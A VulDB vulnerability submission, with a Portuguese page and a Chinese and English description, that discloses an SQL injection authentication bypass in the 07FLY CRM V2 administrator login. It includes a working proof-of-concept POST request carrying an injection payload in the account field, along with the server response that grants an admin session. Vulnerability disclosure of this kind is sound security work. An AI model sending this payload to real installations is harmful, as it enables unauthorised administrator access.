Submeter #205839: An SQL Injection vulnerability exists in 07FLY CRM V2 via a POST request to the login pageinformação

Título	An SQL Injection vulnerability exists in 07FLY CRM V2 via a POST request to the login page
Descrição	07FLY CRM V2 在登录管理员登录页面时被发现容易受到通过 SQL 注入进行身份验证绕过的攻击。攻击可以远程发起。 07FLY CRM官方网站：https://gitee.com/07fly/FLY-CRM # An SQL Injection vulnerability exists in 07FLY CRM V2 via a POST request to the login # Description 07FLY CRM was found vulnerable to authentication bypass via SQL injection when logging into the administrator login page. The attack can be initiated remotely. # Vulnerability Type SQL Inject # Vendor of Product 07FLY CRM v2 # Affected Product Code Base https://gitee.com/07fly/FLY-CRM # Attack Type Remote # Proof of Concept ``` Request： POST /index.php/sysmanage/Login/login_auth/ HTTP/1.1 Content-Type: application/x-www-form-urlencoded Accept: application/json, text/javascript, /; q=0.01 X-Requested-With: XMLHttpRequest Referer: http://www.fly.net/ Content-Length: 79 Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Host: www.fly.net Connection: Keep-alive account=-1'%20OR%20321=6%20AND%20000189=000189%20or%20'QMZIxlBw'='&password=1 ``` ``` HTTP/1.1 200 OK Server: nginx/1.15.11 Date: Sat, 09 Sep 2023 12:14:46 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive X-Powered-By: PHP/5.4.45 Set-Cookie: PHPSESSID=nj2a14ltn5cfgsomfr4iq6ss83; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 126 {"statusCode":"200","message":"\/index.php\/sysmanage\/Index\/","navTabId":"","rel":"1","callbackType":"","forwardUrl":""} ```
Fonte	⚠️ https://github.com/chosir/exp/tree/main
Utilizador	alice2014 (UID 54262)
Submissão	09/09/2023 15h29 (há 3 anos)
Moderação	16/09/2023 09h15 (7 days later)
Estado	Aceite
Entrada VulDB	239861 [07FLY CRM V2 Administrator Login Page login_auth Conta Injeção SQL]
Pontos	20

◂ Voltar Visão Geral Próximo ▸

Do you know our Splunk app?

Download it now for free!